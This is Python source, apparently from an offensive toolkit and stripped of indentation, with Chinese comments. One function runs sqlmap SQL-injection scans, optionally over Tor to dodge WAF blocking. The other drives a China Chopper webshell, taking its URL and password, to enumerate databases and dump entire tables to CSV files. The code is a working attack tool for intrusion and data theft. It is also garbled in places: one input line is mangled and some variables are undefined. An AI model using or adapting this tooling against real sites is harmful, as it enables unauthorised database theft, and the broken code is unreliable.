def sqli_scan(target):
#这里只能直接对target进行sqli检测,不考虑旁站或子站的sqli情况
# target要求是http...格式,不能是纯domain
http_domain=target
print(
'''do you want use 'tor' service in your sqli action? sometimes when your network is not very well,
is not a good idea to use tor,but when your targets has waf,use tor is better.
input Y(y) or N(n) default [N]:>''', end='')
print('\n')
choose_tor=get_input_intime('n', 5)
print('\n')
if choose_tor == 'Y' or choose_tor == 'y':
bool_tor=True
else:
bool_tor=False
print(
'''do you want use 'post' request in your sqli scan? sometimes when you want a faster speed,
use 'get' request is enough,do no need to use 'post' request,meanwhile,when there exists some waf,
use 'get' and 'post' will try too many times's request which will make the waf block you ip,so in these cases,do not use 'post' request,
but use only 'get' request without 'post' request,the number of sqli points will be less in the common sense,
input Y(y) or N(n) default [N]:>''', end='')
print('\n')
choose_post=get_input_intime('n', 5)
print('\n')
if choose_post == 'Y' or choose_post == 'y':
post_or_not=True
else:
post_or_not=False
print('''there are two kinds of sqli blew:
1.use "sqlmap_crawl"
2.use "sqlmap-g-nohuman"
input your number here:''', end='')
print('\n')
num=str(get_input_intime(1, 5))
print('\n')
if num == str(1):
while(1):
if checkvpn():
# 不管scan_way的值为多少,首先对main target进行sqli扫描
sqlmap_crawl(
http_domain, bool_tor, post_or_not)
break
else:
time.sleep(1)
print("vpn is off,scan will continue till vpn is on")
if num == str(2):
while(1):
if checkvpn():
# 不管scan_way的值为多少,首先对main target进行sqli扫描
if http_domain_sqli_scaned == 0:
sqlmap_g_nohuman(
http_domain, bool_tor, post_or_not)
break
else:
time.sleep(1)
print("vpn is off,scan will continue till vpn is on")
domain=http_domain.split("/")[-1]
logFile=homePath+"/.sqlmap/output/%s/log" % domain
content=""
if os.path.exists(logFile)==True:
with open(homePath+"/.sqlmap/output/%s/log" % domain,"r+") as f:
content=f.read()
if len(content)!=0:
return content
else:
return "Sorry,no sqli vul."
def main():
os.system("pip3 install exp10it -U")
global httpHeaderContent, postData, headerFile, postDataFile, everyQueryCount, count, dbHost,dbUser,dbPass, dbName, tableName, url, chopperPass, mode,countOfTableDict,primaryColumnName
# count是第几次查询
httpHeaderContent = {}
postData = {}
url = input("please input webshell url:")
chopperPass = input("please input your webshell pass:"******"1.不抓包模式\nor\n2.抓包后模式?\n不抓包模式目前只测试过php+mysql组合 抓包后模式功能更强大\
[但是需要用charles做sock5代理,proxfier设置chopper的代理为charles提供的对应的代理地址,用charles抓到chopper\
的包后按照代码中要求的格式保存到下面要提供的文件中]\n请选择对应模式序号,默认选择1")
mode = get_input_intime(1)
if str(mode) == "1":
dbHost = input("please input db host:\n")
dbUser = input("please inpuot db user:\n")
dbPass = input("please input db pass:\n")
dbName = input("please input db name:\n")
else:
headerFile = input("please input your post header file abspath,header头要求如代码中的示例格式:\n")
postDataFile = input("please input your post data file abspath,post数据要求如代码中的示例格式:\n")
with open(headerFile, "r+") as f:
for eachLine in f:
eachLine = re.sub("\s$", "", eachLine)
eachHeaderParam = eachLine.split(":")[0]
eachHeaderParamValue = eachLine[len(eachHeaderParam) + 1:]
httpHeaderContent[eachHeaderParam] = eachHeaderParamValue
with open(postDataFile, "r+") as f:
for eachLine in f:
eachLine = re.sub("\s$", "", eachLine)
eachPostParam = eachLine.split("=")[0]
eachPostParamValue = eachLine[len(eachPostParam) + 1:]
postData[eachPostParam] = eachPostParamValue
while 1:
if mode == 1:
pass
else:
dbName = postData['z4']
result = query("show databases")
print("you are accessed on below database:\n")
pureData = result[len(result.split("\r\n")[0] + "\r\n"):]
list = re.findall("([^\s\|]+)", pureData)
for eachDbname in list:
print(eachDbname)
dbName = input("\nplease input db name you want to dump data from:\n")
print("\nthe db you choosed has below tables:\n")
if countOfTableDict=={}:
result = query("show tables")
pureData = result[len(result.split("\r\n")[0] + "\r\n"):]
list = re.findall("([^\s\|]+)", pureData)
for eachTableName in list:
result = query("select count(*) from %s" % eachTableName)
entryNum = re.search("(\d+)", result).group(1)
countOfTableDict[eachTableName]=int(entryNum)
#print(eachTableName)
for eachTableName in countOfTableDict:
print(eachTableName+"[%d]" % int(countOfTableDict[eachTableName]))
tableName = input("\nplease input table name you want to dump:\n")
totalDataCount = int(input("please input how much data there are[想dump多少条数据?输入0代表dump整个表的内容]:\n"))
everyQueryCount = int(
input("please input how much data do you want to query each time[每次要查询多少条数据?]:\n"))
# 下面是一共要查询的次数
totalQueryCount = totalDataCount // everyQueryCount
#下面尝试选择可用于脱库的主键
primaryColumnName=getPrimaryColumnName()
if totalQueryCount!=0:
for i in range(totalQueryCount):
# 下面是每次查询完后对查询参数的改变函数
HandlePostData()
result = post_requests(url, data=postData, headers=httpHeaderContent)
html = result.content.decode("utf8")[3:-3]
#print(html)
# 菜刀中的数据是\r\n换行,如果是用大马中的post数据则有可能是\n换行符,菜刀版本不一样也有可能会是\n换行符,这里
# 的返回的sql数据中是\r\n换行符,不同情况时这里要修改
firstLine = html.split("\r\n")[0]
# 第一行中以->|开头,最后一行为|<-
firstLine2write = firstLine[3:]
data2write = html[len(firstLine + "\r\n"):-3]
with open("%s.csv" % tableName, "a+") as f:
if count == 0:
f.write(firstLine2write + "\r\n")
# 这里每次查询2000条数据,要在post文件的数据中将对应数据修改成每次要查询的条数
count += 1
num = count * everyQueryCount
print("查询了%d条数据" % num)
f.write("\r\n下面是到%d条数据:\r\n" % num)
f.write(data2write)
else:
while 1:
# 下面是每次查询完后对查询参数的改变函数
HandlePostData()
result = post_requests(url, data=postData, headers=httpHeaderContent)
html = result.content.decode("utf8")[3:-3]
#print(html)
# 菜刀中的数据是\r\n换行,如果是用大马中的post数据则有可能是\n换行符,菜刀版本不一样也有可能会是\n换行符,这里
# 的返回的sql数据中是\r\n换行符,不同情况时这里要修改
firstLine = html.split("\r\n")[0]
# 第一行中以->|开头,最后一行为|<-
firstLine2write = firstLine[3:]
data2write = html[len(firstLine + "\r\n"):-3]
with open("%s.csv" % tableName, "a+") as f:
if count == 0:
f.write(firstLine2write + "\r\n")
# 这里每次查询2000条数据,要在post文件的数据中将对应数据修改成每次要查询的条数
count += 1
num = start+everyQueryCount-1
print("查询了%d条数据" % num)
f.write("\r\n下面是到%d条数据:\r\n" % num)
f.write(data2write)